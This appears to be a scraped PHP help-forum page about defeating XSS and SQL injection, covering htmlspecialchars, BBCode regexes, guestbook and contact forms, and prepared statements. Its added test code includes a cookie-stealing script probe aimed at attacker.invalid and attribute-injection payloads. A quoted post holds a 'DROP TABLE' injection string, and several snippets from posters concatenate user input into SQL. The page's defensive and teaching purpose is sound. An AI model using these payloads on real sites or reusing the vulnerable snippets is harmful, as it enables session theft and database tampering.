PHP - XSS Injections With htmlspecialchars($string, ENT_QUOTES, 'UTF-8');
htmlspecialchars($str, ENT_QUOTES, 'UTF-8');

Using this code with UTF-8. I need someone to help craft up some small XSS injections with this. I heard htmlspecialchars doesn't stop all XSS attacks, so I'm wondering what is the most effective XSS attack you can craft to load a simple cookie loader. (Basically, just simple JavaScript injection is all I'm trying to find, because people can use cookie loaders with it, and yeah, that's not good.) Looking for your code to be posted, and once it is, I'll copy it and submit it through the code I posted above and see if there are any vulnerabilities. (On my localhost server.) Thanks!

$str = user input.

Oh, and here is the BBCode regex that the code passes through before this function is returned on the text.

Code:
$text = preg_replace( "#\[b\](.+?)\[/b\]#is", "<span class='b'>\\1</span>", $text );
$text = preg_replace( "#\[i\](.+?)\[/i\]#is", "<i>\\1</i>", $text );
$text = preg_replace( "#\[u\](.+?)\[/u\]#is", "<u>\\1</u>", $text );
$text = preg_replace( "#\[s\](.+?)\[/s\]#is", "<s>\\1</s>", $text );
//Spoiler
$text = preg_replace( "#\[right\](.+?)\[/right\]#is", "<div style='text-align:right'>$1</div>", $text );
//Beautiful Colors
$text = preg_replace( "%\[colou?r=([a-zA-Z]{3,20}|\#[0-9a-fA-F]{6}|\#[0-9a-fA-F]{3})](.+?)\[/colou?r\]%msi", '<span style="color: \\1">\\2</span>', $text );
$text = preg_replace( "%\[colou?r=(rgb\(\d{1,3}, ?\d{1,3}, ?\d{1,3}\))](.+?)\[/colou?r\]%msi", '<span style="color: \\1">\\2</span>', $text );

If anyone can craft up an XSS for this, I'd appreciate it. Because I need this to be secure.

Edited by Monkuar, 10 January 2015 - 06:33 PM.

Similar Tutorials

Hello, I'm learning PHP, so a complete noob right now. First, to the question itself: I want to know how to retrieve the data (variables and their values) from the URL which was made or generated (or whatever the right word is) by using http_build_query() in PHP. I created a query string ($string) with certain variables and dynamic values that I'm passing to a URL

I am trying to protect my guestbook entries from injections such as HTML, XSS, and MySQL injections. My PHP knowledge is very little. If possible, can I have some help please with protecting my entries.
I have a few bits and pieces of code to protect my guestbook from injections that I got from some tutorials that I was reading.

Code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Author: Reality Software
     Website: http://www.realitysoftware.ca
     Note: This is a free template released under the Creative Commons Attribution 3.0 license,
     which means you can use it in any way you want provided you keep the link to the author intact. -->
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title></title>
<link href="style.css" rel="stylesheet" type="text/css" />
</head>
<body>
<!-- header -->
<div id="header">
  <div id="logo"><a href="index.html">Header</a></div>
  <div id="menu">
    <ul>
      <li><a href="index.html">Home</a></li>
      <li><a href="">Link 1</a></li>
      <li><a href="">Link 2</a></li>
      <li><a href="">Link 3</a></li>
      <li><a href="">Contact</a></li>
      <li><a href="guestbook.php">Guestbook</a></li>
    </ul>
  </div>
</div>
<div id="icon"><a href="twitter.com/"><img border="0" src="http://www.000webhost.com/forum/images/twitter.png" alt="twitter" width="58px;" height="53px;" /></a></div>
<!--end header -->
<!-- main -->
<div id="main">
<div id="content">
<div id="text">
<h1><strong>Guestbook</strong></h1>
</div>
<?php
// Fragments collected from tutorials: $input, $db and $name are not defined at this point.
$input = is_numeric($input) ? intval($input) : mysql_real_escape_string($input);
function sanitizeString($string) { return htmlentities( (string) $string, ENT_COMPAT, "UTF-8" ); }
$preparedStatement = $db->prepare('SELECT * FROM guestbook WHERE name = :name');
$preparedStatement->execute(array(':name' => $name));
$rows = $preparedStatement->fetchAll();

$mysql_host = "localhost";
$mysql_database = "a7560006_guest";
$mysql_user = "a7560006_host";
$mysql_password = "mypassword";
// Connect to server and select database.
mysql_connect("$mysql_host", "$mysql_user", "$mysql_password") or die("cannot connect server");
mysql_select_db("$mysql_database") or die("cannot select DB");
$tbl_name="guestbook"; // Table name

$name = ($_POST['name']);
$comment = ($_POST['comment']);
$comment = stripslashes($comment);
$name = stripslashes($name);
$comment = str_replace("<","&lt;",$comment);
$name = str_replace("<","&lt;",$name);
$datetime=date("M-d-Y h:i:s A"); //date time
$verif_box = ($_POST['verif_box']);
if(md5($verif_box).'a4xn' != $_COOKIE['tntcon']){
?>
<table width="400" border="0" align="center">
<tr><td align="center"><h4>You have not entered captcha or entered incorrect captcha!</h4></td></tr>
</table>
</div>
<!-- footer -->
<div id="footer">
<div id="left_footer">© Copyright 2011<strong> Author </strong></div>
<div id="right_footer">
<!-- Please do not change or delete this link. Read the license! Thanks. :-) -->
Design by <a href="http://www.realitysoftware.ca" title="Website Design">Reality Software</a>
</div>
</div>
<!-- end footer -->
</div>
<!-- end main -->
</body>
</html>
<?
exit;
}
if(empty($name) || empty($comment)) {
?>
<table width="400" border="0" align="center">
<tr><td align="center"><h3>Sorry, all fields are required!</h3></td></tr>
</table>
<?
} else {
// Values are interpolated straight into the SQL string.
$sql="INSERT INTO $tbl_name (name, comment, datetime) VALUES ('$name', '$comment', '$datetime')";
$result=mysql_query($sql);
//check if query successful
if($result) {
?>
<table width="400" border="0" align="center">
<tr><td align="center"><h3>Thank you for signing my guestbook!</h3></td></tr>
</table>
<?
echo "<meta http-equiv='Refresh' content='1; URL=viewguestbook.php'>"; // link to view guestbook page
} else {
echo "ERROR";
}
mysql_close();
}
?>
</div>
<!-- footer -->
<div id="footer">
<div id="left_footer">© Copyright 2011<strong> Author </strong></div>
<div id="right_footer">
<!-- Please do not change or delete this link. Read the license! Thanks. :-) -->
Design by <a href="http://www.realitysoftware.ca" title="Website Design">Reality Software</a>
</div>
</div>
<!-- end footer -->
</div>
<!-- end main -->
</body>
</html>

Hello, I have been using preg_match() to throw out invalid form characters and then both mysql_real_escape_string() and stripslashes() to escape data variables before using them with MySQL. But how about messages from a text area, for example on a contact form? You can't limit the characters for the user. Is escaping variables good enough to eliminate SQL injections from user input?

Hi everyone, I have been the victim (at least I think) of SQL injection attacks! I believe this as my contact us DB table is full of 1's. How can I stop this from happening? Here's the contact form:

Code:
<form method="get" action="contact-send.php">
Name:<br />
<input type="text" name="name" id="name" size="30" /><br />
Email:<br />
<input type="email" name="email" id="email" size="30" /><br />
Your Question:<br />
<textarea name="question" id="question" rows="10" cols="50"></textarea><br />
<input type="submit" name="submit" value="send" />
</form>

And here's the script 'contact-send.php':

Code:
<?PHP
session_start();
include ('php only scripts/db.php');
if(isset($_POST['submit'])){
    $name = $_POST['name'];
    $email = $_POST['email'];
    $question = $_POST['question'];
    //your code to insert variables into db can go here or after the if statement
    $query = "INSERT INTO contact_us (name, email, questions) VALUES ('" .$name. "', '" .$email. "', '" .$question. "')";
    $result = mysql_query($query) or die(mysql_error());
    echo $name."<br/>".$email."<br/>".$question;
}
header( 'Location: http://www.removalspace.com/contactconf.php' );
?>

Do I have to have if(isset on EACH variable? Like on name, email and question too?

I am having problems with a search feature I am using for a website I am building. Everything was working fine when I was testing on my local machine using EasyPHP 3.0.
The issue I am having is that once I uploaded the site to a "live" server and tested it, my search function wouldn't work. The issue resides in the two lines with the magic quotes and the real escape string; for some reason those lines worked fine while testing using EasyPHP 3.0, but now I must delete those lines in order for my search function to work. The problem is that deleting those lines makes me vulnerable to an SQL injection. I have tried deleting just the magic quotes line and everything works properly, but then I am not seeing any kind of slash-stripping/sanitizing when I enter a statement like this into my search: a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't. Any help on this issue would be greatly appreciated!

Code:
//get data
$button = $_GET['submit'];
if (get_magic_quotes_gpc() == 0){
    $search = mysql_real_escape_string($_GET['search']); // clean up the search string
} else {
    $search = $_GET['search'];
}
$limit = 9;
$page = $_GET['page'];
if($page) $start = ($page - 1) * $limit;

I also tried using mysql_real_escape_string on my construct, but I get syntax errors because of the | being used before and after the $search_each. That | character must remain in place in order for my search to work the way I want it to.

Code:
$x++;
if ($x==1)
    $construct .= "keywords LIKE '%".mysql_real_escape_string(|$search_each|)."%'";
else
    $construct .= "AND keywords LIKE '%|$search_each|%'";
}

Basically, I have the following code ($c2 is my connection variable):

Code:
$rid = $_GET['id'];
$q = mysql_query("SELECT * FROM reports WHERE id = $rid", $c2) or die(mysql_error());
$report = mysql_fetch_array($q);

$report is used later on to gather more information that is outputted to the user. However, if in the URL someone were to put id=1', they would have an error message spat out to them (something along the lines of: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1), indicating a SQL injection exploit. How would I go about fixing this, and also preventing SQL injection? Thanks a bunch, Mark

Here is the code that I am using to accept data and display the data. To accept it and add it to the database I am using:

Code:
$comment = $_POST['txtcomment'];
$comment = @mysql_real_escape_string($comment);

To display the data from the DB I am using:

Code:
$comment = $rowscomment['comment'];
<?php echo nl2br($comment); ?>

Please help me correct it. I am still learning PHP.

I'm getting this error and not sure of my fix.

Warning: htmlspecialchars() expects parameter 1 to be string, array given in /home/xtremer/public_html/efedmanager/processes/polls.php on line 13

Code:
$answer = explode(',', $_POST['answersList']);
$answer = htmlspecialchars($answer);

Hi, should I use htmlspecialchars() when I write to MySQL or when I read from MySQL, and should I use another function for safety?

Hello and thanks in advance for any help. Overview: I'm trying to pull data from an XML API using SimpleXML. I have run into a problem with special characters and entities that SimpleXML does not accept, i.e. &nbsp;. I've tried all the solutions I could find to no avail. SimpleXML gives me this error: parser error : Entity 'nbsp' not defined in. Here is my code.

Code:
// Fetch the raw feed text first: the entity has to be replaced before the XML
// is parsed, because the parser is what rejects the undefined entity.
$raw = file_get_contents('URL TO API FEED');
// XML only defines lt, gt, amp, apos and quot; replace the HTML-only entity.
$raw = str_ireplace('&nbsp;', ' ', $raw);
$feed = simplexml_load_string($raw);
echo 'Game Title: ' .$feed->game. '</br>';
echo 'Points Earned: ' .$feed->gamerscore. '</br>';
echo 'Total Achievements: ' .$feed->totalachievements. '</br>';
foreach($feed->achievements->achievement as $ach) {
    // $ach->title is the title of the current achievement element
    $output = htmlentities($ach->title, ENT_QUOTES, "UTF-8");
    echo $output;
    // The artwork URL comes from the feed, so it is escaped before being placed in an attribute.
    if( !empty($ach->unlockedartwork)){
        echo '<img src="' .htmlspecialchars($ach->unlockedartwork, ENT_QUOTES, "UTF-8"). '"></img></br>';
    }else {
        echo '<img src="' .htmlspecialchars($ach->artwork, ENT_QUOTES, "UTF-8"). '"></img></br>';
    }
}

Here is the code I'm trying to retrieve.

Code:
<achievement id="40">
  <title>Have Gun Will Travel </title>
  <artwork>http://</artwork>
  <gamerscore>20</gamerscore>
  <unlocked>true</unlocked>
  <unlockdate>7/4/2010</unlockdate>
</achievement>

What do most people prefer to use? htmlspecialchars or htmlentities? Which one is necessary while protecting form fields?

Edited July 28, 2019 by mahenda

I need to put this inside of a p tag so I can change some properties, but everything I've tried doesn't work and just shows nothing.
I've tried this:

Code:
printf('<p style="text-align: left; width: 500px;">', htmlspecialchars($fetch['shout'], ENT_QUOTES, 'UTF-8'), '</p>');

This is what I need to be wrapped in p tags:

Code:
htmlspecialchars($fetch['shout'], ENT_QUOTES, 'UTF-8');

EDIT: I've noticed the code below works, but when I style it inside of the tag the text won't show. Should I include a CSS file on the PHP file?

Code:
echo "<p>".htmlspecialchars($fetch['shout'])."</p>\n";

EDIT: I just needed to create the CSS for the p tags in the index and it worked perfectly fine. Sorry for the pointless thread.

Edited by Alanay, 18 December 2014 - 09:14 AM.

When sending data via $_POST, for example, I've seen the data get filtered with both mysql_real_escape_string and htmlspecialchars. When should you use one or the other?

Hi all, please advise me: 1. When to use htmlspecialchars() or mysql_real_escape_string? 2. What is the difference? Thank you for your help.

Does anyone have an example of when htmlentities() would be used over htmlspecialchars()?

Hello dears, I've tried to use htmlspecialchars or htmlentities but neither works any longer!

Example 1:

Code:
<?php
$new = htmlspecialchars("<a href='test'>Test</a>", ENT_QUOTES);
echo $new;
?>

Output should be &lt;a href=&#039;test&#039;&gt;Test&lt;/a&gt;

Code:
<?php
$str = "A 'quote' is <b>bold</b>";
echo htmlentities($str);
?>

Output should be A 'quote' is &lt;b&gt;bold&lt;/b&gt;

But it isn't working? What is wrong?

Hello guys, I am new here and I am also new to PHP. I self-study HTML, CSS, JS and Bootstrap for front-end, and for back-end PHP, MySQL, PDO and OOP, and I will soon start MVC, then Laravel. I am trying to secure my input field and I do not want any attacks or SQL injects. I see people use filter_var and htmlentities and htmlspecialchars, and each one has a different opinion. Can someone help me and tell me what is best for securing input, where all values will be stored in the database? Thanks <3
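The following is an added example, not code from any post in this thread. It answers the opening question (what an attacker can get past htmlspecialchars() followed by the BBCode regexes) and the later questions about when htmlspecialchars() belongs, by running the poster's rules in the only order in which they can work (escape first, then regex) over a set of constructed probe strings, and checking the rendered HTML against an allow-list of the tags the rules themselves emit. The `$escapeFirst = false` branch, the probe strings and the `only_bbcode_markup()` checker are assumptions added here; ENT_SUBSTITUTE is added to the poster's flags so invalid UTF-8 is replaced rather than turning the output into an empty string.

```php
<?php
// Added example: not from the original thread. Assumes htmlspecialchars()
// runs before the BBCode regexes, which is the order that lets the generated
// <span>/<i>/... tags survive at all.
declare(strict_types=1);

function render_bbcode(string $input, bool $escapeFirst = true): string
{
    // Step 1: neutralise HTML metacharacters in the raw user input. ENT_QUOTES
    // covers both quote styles; ENT_SUBSTITUTE (added here) replaces invalid
    // UTF-8 with U+FFFD instead of returning an empty string.
    $text = $escapeFirst
        ? htmlspecialchars($input, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
        : $input;   // deliberately unsafe variant, only to show what the check catches

    // Step 2: the BBCode rules from the original post. '$1' in a single-quoted
    // replacement is the same back-reference as "\\1" in the poster's strings.
    $text = preg_replace('#\[b\](.+?)\[/b\]#is', '<span class="b">$1</span>', $text);
    $text = preg_replace('#\[i\](.+?)\[/i\]#is', '<i>$1</i>', $text);
    $text = preg_replace('#\[u\](.+?)\[/u\]#is', '<u>$1</u>', $text);
    $text = preg_replace('#\[s\](.+?)\[/s\]#is', '<s>$1</s>', $text);
    $text = preg_replace('#\[right\](.+?)\[/right\]#is', '<div style="text-align:right">$1</div>', $text);
    // Colour values are constrained by the pattern itself: a 3-20 letter name,
    // #rgb/#rrggbb, or rgb(n,n,n). Nothing else can reach the style attribute.
    $text = preg_replace(
        '%\[colou?r=([a-zA-Z]{3,20}|\#[0-9a-fA-F]{6}|\#[0-9a-fA-F]{3})](.+?)\[/colou?r\]%msi',
        '<span style="color: $1">$2</span>', $text);
    $text = preg_replace(
        '%\[colou?r=(rgb\(\d{1,3}, ?\d{1,3}, ?\d{1,3}\))](.+?)\[/colou?r\]%msi',
        '<span style="color: $1">$2</span>', $text);
    return $text;
}

// Allow-list check on the rendered HTML: every '<' must begin one of the tags
// the rules above emit. Anything else means user-controlled markup got through.
function only_bbcode_markup(string $html): bool
{
    $fixed = ['<span class="b">', '</span>', '<i>', '</i>', '<u>', '</u>', '<s>', '</s>',
              '<div style="text-align:right">', '</div>'];
    $colour = '/^<span style="color: (?:[a-zA-Z]{3,20}|#[0-9a-fA-F]{6}|#[0-9a-fA-F]{3}'
            . '|rgb\(\d{1,3}, ?\d{1,3}, ?\d{1,3}\))">/';
    $pos = 0;
    while (($pos = strpos($html, '<', $pos)) !== false) {
        $rest = substr($html, $pos);
        $ok = preg_match($colour, $rest) === 1;
        foreach ($fixed as $tag) {
            if (strncmp($rest, $tag, strlen($tag)) === 0) { $ok = true; break; }
        }
        if (!$ok) { return false; }
        $pos++;
    }
    return true;
}

// Constructed probes of the kind a tester would paste into the form.
$probes = [
    '<script>new Image().src="http://attacker.invalid/?c="+document.cookie</script>',
    '[b]"><img src=x onerror=alert(1)>[/b]',
    "[color=red' onmouseover='alert(1)]x[/color]",
    '[color=#ff0000]red[/color] [color=rgb(1,2,3)]blue-ish[/color]',
    '[right]plain [i]text[/i][/right]',
];

foreach ($probes as $p) {
    $safe   = render_bbcode($p);
    $unsafe = render_bbcode($p, false);
    printf("%-55s escaped: %-5s unescaped: %s\n", substr($p, 0, 55),
        only_bbcode_markup($safe) ? 'ok' : 'LEAK',
        only_bbcode_markup($unsafe) ? 'ok' : 'LEAK');
    echo "   ", $safe, "\n";
}
```

With escaping first, the capture groups can no longer contain `<`, `>`, `"` or `'`, so the only attribute values an attacker controls are the colour strings, and those are restricted by the regex alternatives to letters, hex digits or an rgb() triple. The third probe shows that even the unescaped branch does not match `[color=red' ...]`, because the pattern demands `]` directly after the letters; the first two probes show what the allow-list catches when escaping is skipped. The checker is a test aid for exactly these rules, not a general HTML sanitiser.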
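The guestbook, contact form, keyword search, reports.php?id= and comment-display posts above all build SQL from user input and then ask where htmlspecialchars() or mysql_real_escape_string() belongs. The added example below (mine, not from any post) shows the separation a practitioner would use: parameters bound with PDO for the database, LIKE wildcards escaped in the search term, and htmlspecialchars() applied only when a stored value is rendered into HTML. It assumes the pdo_sqlite driver and uses an in-memory SQLite database so it runs offline; the table names mirror the posts, and the inserted rows are constructed test data.

```php
<?php
// Added example, not the posters' code. Uses in-memory SQLite (assumption)
// so it runs stand-alone; the same PDO calls work against MySQL, where you
// would also set PDO::ATTR_EMULATE_PREPARES => false in the options.
declare(strict_types=1);

$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE reports (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec('CREATE TABLE guestbook (id INTEGER PRIMARY KEY AUTOINCREMENT, name TEXT, comment TEXT, datetime TEXT)');
$db->exec("INSERT INTO reports VALUES (1, 'first report'), (2, 'second report')");

// reports.php?id=...: validate as an integer and bind it, never concatenate.
function fetch_report(PDO $db, string $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;                         // "1'" or "1 OR 1=1" never reaches SQL
    }
    $stmt = $db->prepare('SELECT id, title FROM reports WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Guestbook insert: no stripslashes(), no manual escaping and no HTML
// encoding before storage; the driver sends values apart from the SQL text.
function add_entry(PDO $db, string $name, string $comment): int
{
    if ($name === '' || $comment === '') {
        throw new InvalidArgumentException('all fields are required');
    }
    $stmt = $db->prepare('INSERT INTO guestbook (name, comment, datetime) VALUES (:name, :comment, :dt)');
    $stmt->execute([':name' => $name, ':comment' => $comment, ':dt' => date('M-d-Y h:i:s A')]);
    return (int) $db->lastInsertId();
}

// Keyword search: the pattern is bound, and LIKE metacharacters typed by the
// user are escaped with '!' so "%" searches for a literal percent sign.
function search_entries(PDO $db, string $term): array
{
    $pattern = '%' . strtr($term, ['!' => '!!', '%' => '!%', '_' => '!_']) . '%';
    $stmt = $db->prepare("SELECT name, comment FROM guestbook WHERE comment LIKE :p ESCAPE '!'");
    $stmt->execute([':p' => $pattern]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Display: escape for HTML at output time; nl2br() runs after escaping so
// the <br /> it adds is the only markup in the result.
function render_entry(array $row): string
{
    $flags = ENT_QUOTES | ENT_SUBSTITUTE;
    return '<p><b>' . htmlspecialchars($row['name'], $flags, 'UTF-8') . '</b>: '
         . nl2br(htmlspecialchars($row['comment'], $flags, 'UTF-8')) . '</p>';
}

// Constructed inputs modelled on the payloads quoted in the posts.
var_dump(fetch_report($db, "1'"));   // NULL: no SQL error page, no injection
var_dump(fetch_report($db, '2'));    // ['id' => 2, 'title' => 'second report']
add_entry($db, 'Mark', "a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't");
add_entry($db, '<script>alert(1)</script>', "100% sure\nsecond line");
echo count(search_entries($db, '%')), " entry contains a literal percent sign\n";   // 1
foreach (search_entries($db, 'DROP TABLE') as $row) {
    echo render_entry($row), "\n";   // the payload is stored and shown as plain text
}
```

The two encodings answer the "which one, and when" questions directly: the database never needs HTML-encoded data, and the HTML page never needs SQL-escaped data, so each transformation is applied at the boundary it protects and nowhere else. Storing raw text also keeps the `1'` from the reports post and the `DROP TABLE` string from the search post as harmless data, which is what a prepared statement guarantees regardless of what stripslashes() or magic quotes did on the way in.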